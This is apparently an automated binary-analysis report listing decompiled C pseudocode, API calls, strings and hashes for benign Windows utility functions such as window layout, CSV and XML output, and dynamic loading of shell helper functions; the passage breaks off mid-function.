Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040DB6F(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryW(L"shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040db76
0x0040db7e
0x0040db86
0x0040db8e
0x0040db9b
0x0040db9b
0x0040db9e
0x0040dba8

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,00402FB4,00000000), ref: 0040DB78
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

Strings

SHAutoComplete, xrefs: 0040DB80
shlwapi.dll, xrefs: 0040DB71

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD

Uniqueness

Uniqueness Score: -1.00%

Function 004076F4, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004076F4(intOrPtr* __edi) {
				void* __esi;
				void** _t11;
				intOrPtr* _t18;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t27 = __edi;
				 *__edi = 0x410168;
				E0040768E(__edi);
				_t31 =  *((intOrPtr*)(__edi + 0x14));
				if(_t31 != 0) {
					E00406355(_t31);
					_push(_t31);
					L0040E032();
				}
				_t32 =  *((intOrPtr*)(_t27 + 0x10));
				if(_t32 != 0) {
					E00406355(_t32);
					_push(_t32);
					L0040E032();
				}
				_t33 =  *((intOrPtr*)(_t27 + 0xc));
				if(_t33 != 0) {
					E00406355(_t33);
					_push(_t33);
					L0040E032();
				}
				_t34 =  *((intOrPtr*)(_t27 + 8));
				if(_t34 != 0) {
					E00406355(_t34);
					_push(_t34);
					L0040E032();
				}
				_t18 = _t27;
				_pop(_t35);
				_push(_t27);
				_t36 = _t18;
				_t28 = 0;
				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
						_t28 = _t28 + 1;
					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
				}
				_t11 =  *((intOrPtr*)( *_t36))();
				free( *_t11);
				return _t11;
			}

0x004076f4
0x004076f7
0x004076fd
0x00407702
0x00407707
0x00407709
0x0040770e
0x0040770f
0x00407714
0x00407715
0x0040771a
0x0040771c
0x00407721
0x00407722
0x00407727
0x00407728
0x0040772d
0x0040772f
0x00407734
0x00407735
0x0040773a
0x0040773b
0x00407740
0x00407742
0x00407747
0x00407748
0x0040774d
0x0040774e
0x00407750
0x00407757
0x00407758
0x0040775a
0x0040775f
0x00407766
0x00407770
0x00407773
0x00407774
0x00407766
0x0040777d
0x00407781
0x00407789

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??3@YAXPAX@Z.MSVCRT ref: 0040770F
??3@YAXPAX@Z.MSVCRT ref: 00407722
??3@YAXPAX@Z.MSVCRT ref: 00407735
??3@YAXPAX@Z.MSVCRT ref: 00407748
free.MSVCRT(00000000), ref: 00407781

Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
Opcode Fuzzy Hash: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00406B34, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t31;
				struct HWND__* _t33;

				_t31 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t33 = GetParent(_t31);
					GetWindowRect(_t31,  &_v20);
					GetClientRect(_t33,  &_v36);
					MapWindowPoints(0, _t33,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00405D0F(_t31, 0x400000);
				}
				return 1;
			}

0x00406b3f
0x00406b42
0x00406b4c
0x00406b53
0x00406b5e
0x00406b6e
0x00406b7c
0x00406b84
0x00406b8a
0x00406b90
0x00406b95
0x00406b9d
0x00406ba3
0x00406ba9

APIs

GetParent.USER32(?), ref: 00406B46
GetWindowRect.USER32 ref: 00406B53
GetClientRect.USER32 ref: 00406B5E
MapWindowPoints.USER32 ref: 00406B6E
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409F23, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409F23(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040E038();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040E032();
				return _t20;
			}

0x00409f23
0x00409f29
0x00409f30
0x00409f31
0x00409f32
0x00409f3a
0x00409f3d
0x00409f3f
0x00409f48
0x00409f4b
0x00409f4e
0x00409f50
0x00409f53
0x00409f5a
0x00409f64
0x00409f6e
0x00409f73
0x00409f76
0x00409f79
0x00409f7c
0x00409f7f
0x00409f80
0x00409f85
0x00409f86
0x00409f89
0x00409f91

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409F32
memcpy.MSVCRT ref: 00409F5A
memcpy.MSVCRT ref: 00409F64
memcpy.MSVCRT ref: 00409F6E
??3@YAXPAX@Z.MSVCRT ref: 00409F89

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
Opcode Fuzzy Hash: 84cba42ff6f7e9e76cb5b3eb48464ce6a132065f142cfd3aba4b79740acf243f
Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403054, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				intOrPtr _t15;
				struct HDWP__* _t31;
				intOrPtr _t34;
				RECT* _t36;

				_push(__ecx);
				_t34 = __ecx;
				_v8 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t15 = _a12;
							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
						}
					} else {
						E00401810(__ecx + 0x40);
					}
				} else {
					_t31 = BeginDeferWindowPos(3);
					_t36 = _t34 + 0x40;
					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
					E004017E9(_t36, _t31, 1, 1, 1, 0);
					E004017E9(_t36, _t31, 2, 1, 1, 0);
					EndDeferWindowPos(_t31);
					InvalidateRect( *(_t36 + 0x10), _t36, 1);
					_t34 = _v8;
				}
				return E004015CE(_t34, _a4, _a8, _a12);
			}

0x00403057
0x0040305e
0x00403060
0x00403063
0x004030b9
0x004030c9
0x004030cb
0x004030ce
0x004030d5
0x004030d5
0x004030bb
0x004030be
0x004030be
0x00403065
0x00403076
0x0040307d
0x00403081
0x0040308c
0x00403098
0x0040309e
0x004030a9
0x004030af
0x004030b2
0x004030ef

APIs

BeginDeferWindowPos.USER32 ref: 00403068

Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2

EndDeferWindowPos.USER32(00000000), ref: 0040309E
InvalidateRect.USER32(?,?,00000001), ref: 004030A9

Strings

$, xrefs: 004030C5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$BeginInvalidateItemRect
String ID: $
API String ID: 4234876885-3993045852
Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409457, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E004086F5(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t26, _t26, _a4,  &_v1028);
			}

0x00409460
0x00409479
0x0040947b
0x00409480
0x00409492
0x0040949e
0x004094a2
0x004094a8
0x004094af
0x004094b0
0x004094bb
0x004094c0
0x004094c1
0x004094dd

APIs

memset.MSVCRT ref: 0040947B
memset.MSVCRT ref: 00409492

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 004094C1

Strings

</%s>, xrefs: 004094B0

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98

Uniqueness

Uniqueness Score: -1.00%

Function 00406C43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040E340(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x412ec8; // 0x0
				}
				_t25 =  *0x412c38;
				if( *0x412c38 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00406CC6(_t12);
					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00406BAC, 0);
				}
				return _t9;
			}

0x00406c43
0x00406c4b
0x00406c51
0x00406c55
0x00406c57
0x00406c57
0x00406c5d
0x00406c65
0x00406c67
0x00406c7d
0x00406c82
0x00406c85
0x00406c86
0x00406ca1
0x00406cad
0x00406cad
0x00000000
0x00406cbd
0x00406cc5

APIs

memset.MSVCRT ref: 00406C7D
SetWindowTextW.USER32(?,?), ref: 00406CAD
EnumChildWindows.USER32 ref: 00406CBD

Strings

caption, xrefs: 00406C92

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405954, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405954(struct HWND__* _a4) {
				void _v514;
				short _v516;
				signed int _t11;

				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fe);
				GetClassNameW(_a4,  &_v516, 0xff);
				_t11 =  &_v516;
				_push(L"edit");
				_push(_t11);
				L0040E03E();
				asm("sbb eax, eax");
				return  ~_t11 + 1;
			}

0x0040595d
0x00405973
0x0040598a
0x00405990
0x00405996
0x0040599b
0x0040599c
0x004059a4
0x004059a9

APIs

memset.MSVCRT ref: 00405973
GetClassNameW.USER32 ref: 0040598A
_wcsicmp.MSVCRT ref: 0040599C

Strings

edit, xrefs: 00405996

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA9D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x413268 == 0) {
					_t1 = LoadLibraryW(L"shell32.dll");
					 *0x413268 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x413264 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040daa4
0x0040daab
0x0040dab3
0x0040dab8
0x0040dac0
0x0040dac6
0x00000000
0x0040dac6
0x0040dab8
0x0040dacb

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

Strings

SHGetSpecialFolderPathW, xrefs: 0040DABA
shell32.dll, xrefs: 0040DAA6

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C

Uniqueness

Uniqueness Score: -1.00%

Function 00408885, Relevance: 6.1, APIs: 4, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				wchar_t* _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				wchar_t* _t63;
				wchar_t* _t64;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				wchar_t* _t79;
				wchar_t* _t83;

				_t68 = __ebx;
				_t79 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
						_t71 = _a8;
						if(_t71 != _t79) {
							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
						} else {
							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t83, 0x2c);
						_pop(_t69);
						if(_t41 != 0) {
							L10:
							_v36 = _t79;
							_v32 = _t79;
							_v28 = _t79;
							_v20 = 0x100;
							_v24 = 1;
							_v16 = 0x22;
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t83 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t81 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E004063DD(_t48, _t69, _t81, __eflags);
								_t83 =  &(_t83[0]);
								__eflags = _t83;
							}
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							_t53 = _v36;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40f454;
							}
							E00408857(_t68, _t69, _a4, _t53);
							E00406355( &_v36);
							_t79 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t83, 0x22);
							_pop(_t69);
							if(_t62 != 0) {
								goto L10;
							} else {
								_t63 = wcschr(_t83, 0xd);
								_pop(_t69);
								if(_t63 != 0) {
									goto L10;
								} else {
									_t64 = wcschr(_t83, 0xa);
									_pop(_t69);
									if(_t64 != 0) {
										goto L10;
									} else {
										E00408857(_t68, _t69, _a4, _t83);
									}
								}
							}
						}
						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
							E00408857(_t68, _t69, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
				}
				return E00408857(_t68, _t69, _a4, L"\r\n");
			}

0x00408885
0x0040888c
0x00408891
0x00408894
0x0040889b
0x004088a1
0x004088a4
0x004088a9
0x004088c2
0x004088ab
0x004088b4
0x004088b4
0x004088c7
0x004088cf
0x004088d0
0x0040890c
0x0040890f
0x00408912
0x00408915
0x0040891f
0x00408926
0x0040892d
0x00408934
0x00408959
0x00408959
0x0040895c
0x0040895f
0x00408962
0x00408965
0x00000000
0x00000000
0x0040893b
0x0040893f
0x0040894e
0x00408951
0x00408951
0x00408941
0x00408941
0x00408946
0x00408946
0x00408952
0x00408958
0x00408958
0x00408958
0x0040896e
0x00408973
0x00408976
0x00408978
0x0040897a
0x0040897a
0x00408985
0x0040898d
0x00408992
0x00408992
0x004088d2
0x004088d5
0x004088dd
0x004088de
0x00000000
0x004088e0
0x004088e3
0x004088eb
0x004088ec
0x00000000
0x004088ee
0x004088f1
0x004088f9
0x004088fa
0x00000000
0x004088fc
0x00408902
0x00408902
0x004088fa
0x004088ec
0x004088de
0x0040899b
0x004089a7
0x004089a7
0x004089ac
0x004089b2
0x004089bb
0x004089cd

APIs

wcschr.MSVCRT ref: 004088C7
wcschr.MSVCRT ref: 004088D5
wcschr.MSVCRT ref: 004088E3
wcschr.MSVCRT ref: 004088F1

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID:
API String ID: 1983396471-0
Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A084, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				signed int _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				void* _t76;
				signed int _t80;
				wchar_t* _t91;
				void* _t92;
				void* _t94;
				void* _t95;

				_t76 = __eax;
				E00407A66(__eax, __eflags);
				_v12 = 0;
				_t57 = 0;
				while(1) {
					_t91 = _a4;
					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
						break;
					}
					_t57 = _t57 + 1;
					if(_t57 < 1) {
						continue;
					}
					_t71 = wcslen(_t91);
					if(_t71 >= 3) {
						break;
					}
					_push(_t91);
					L0040E062();
					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
					}
					L19:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t80 =  *0x4131d4; // 0x1
					_t58 = _v12;
					 *0x4131d4 =  *0x4131d4 + 1;
					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
					return _t58;
				}
				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
					L14:
					_t92 = 0;
					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
					_v8 = 0;
					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
						goto L19;
					} else {
						goto L15;
					}
					do {
						L15:
